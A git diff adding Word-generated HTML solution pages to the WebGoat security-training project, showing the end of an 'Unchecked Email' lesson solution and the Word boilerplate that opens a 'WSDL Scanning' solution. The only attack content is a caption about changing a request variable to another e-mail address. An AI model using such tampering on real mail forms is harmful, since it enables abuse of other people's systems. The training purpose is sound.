+to <a href="mailto:bill.gates@microsoft.com">bill.gates@microsoft.com</a><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_170"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/UncheckedEmail_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=369
+src="/WebGoat/lesson_solutions/UncheckedEmail_files/image006.jpg" v:shapes="Picture_x0020_170"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>3</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Change the variable to another e-mail
+address<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_171"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:273.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/UncheckedEmail_files/image007.png" o:title="" cropbottom="3231f"/>
+</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=365
+src="/WebGoat/lesson_solutions/UncheckedEmail_files/image008.jpg" v:shapes="Picture_x0020_171"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>4</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Lesson 5 Completed<o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/UncheckedEmail_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/UncheckedEmail_files/filelist.xml b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/filelist.xml
new file mode 100644
index 000000000..679895ff7
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/filelist.xml
@@ -0,0 +1,14 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../UncheckedEmail.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image004.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image006.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image008.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image001.png b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image001.png
new file mode 100644
index 000000000..4c5655e62
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image002.jpg b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image002.jpg
new file mode 100644
index 000000000..62a30cf94
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image003.png b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image003.png
new file mode 100644
index 000000000..8fd3ad15c
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image004.jpg b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image004.jpg
new file mode 100644
index 000000000..2a5943d8f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image004.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image005.png b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image005.png
new file mode 100644
index 000000000..861f3dc14
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image006.jpg b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image006.jpg
new file mode 100644
index 000000000..fae87c128
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image006.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image007.png b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image007.png
new file mode 100644
index 000000000..46049533d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image008.jpg b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image008.jpg
new file mode 100644
index 000000000..fe5aa8442
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/image008.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/UncheckedEmail_files/themedata.thmx b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/UncheckedEmail_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/WSDLScanning.html b/main/project/WebContent/lesson_solutions/WSDLScanning.html
new file mode 100644
index 000000000..b4aeb478c
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WSDLScanning.html
@@ -0,0 +1,724 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/WSDLScanning_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WSDLScanning_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>5</o:Revision>
+  <o:TotalTime>43</o:TotalTime>
+  <o:Created>2007-07-11T14:08:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:21:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>113</o:Words>
+  <o:Characters>645</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>5</o:Lines>
+  <o:Paragraphs>1</o:Paragraphs>
+  <o:CharactersWithSpaces>757</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/WSDLScanning_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/WSDLScanning_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Cambria;
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1073741899 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
